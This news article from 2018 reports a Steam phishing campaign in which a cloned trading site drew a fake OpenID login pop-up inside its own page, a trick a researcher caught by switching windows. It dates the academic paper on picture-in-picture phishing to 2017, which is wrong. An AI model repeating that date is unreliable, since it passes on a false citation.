Scammers used a picture-in-picture phishing pop-up

Oct 1, 2018 20:29 GMT  ·  By

Phishing attacks are nothing new, especially when it comes to spam e-mails sent in the hope of reaching the perfectly gullible victim who would click on a maliciously crafted link or open a malware dropper script disguised as an attachment.

That being said, a security researcher from San Francisco, CA, using Aurum as an online handle, has found a phishing campaign targeting Steam users using an unorthodox technique of spoofing legitimate login pages.

He found the phishing scam site, tradeit.cash, after a discussion with one of the scammers behind this phishing campaign and he noticed that the phishing website was an almost identical copy of skins.cash, a legitimate Steam trading site.

From here on out things got very interesting seeing that the scammers went through the trouble of hosting their phishing site on CloudFare and even chose to use a CloudFare SSL certificate to make it as believable as possible.

The phishing started with a pop-up which asked him to log in with Steam because the phishing website was under load.

The Steam phishing website used a picture-in-picture phishing technique to simulate an OpenID login screen flawlessly

Going through with it, Aurum realized that the something was not quite right given that the website he thought was a scam from the get-go was opening an OpenID Steam login pop-up.

And this is where things get really interesting. The pop-up which looked exactly like the real thing was drawn within the phishing website's canvas, and Aurum caught on to it after trying to switch between the main window and the pop-up using the taskbar icon.

Although seemingly ground-breaking and quite devious, this authentication form impersonation technique has been observed before by a team of security researchers from Standford University and Microsoft Research and documented in a paper named "An evaluation of extended validation and picture-in-picture phishing attacks" in February 2017.

Aurum's discovery is still valuable though since it gives us insight on the way threat actors are re-using malicious techniques proven to be effective in new attack campaigns targeting other victims.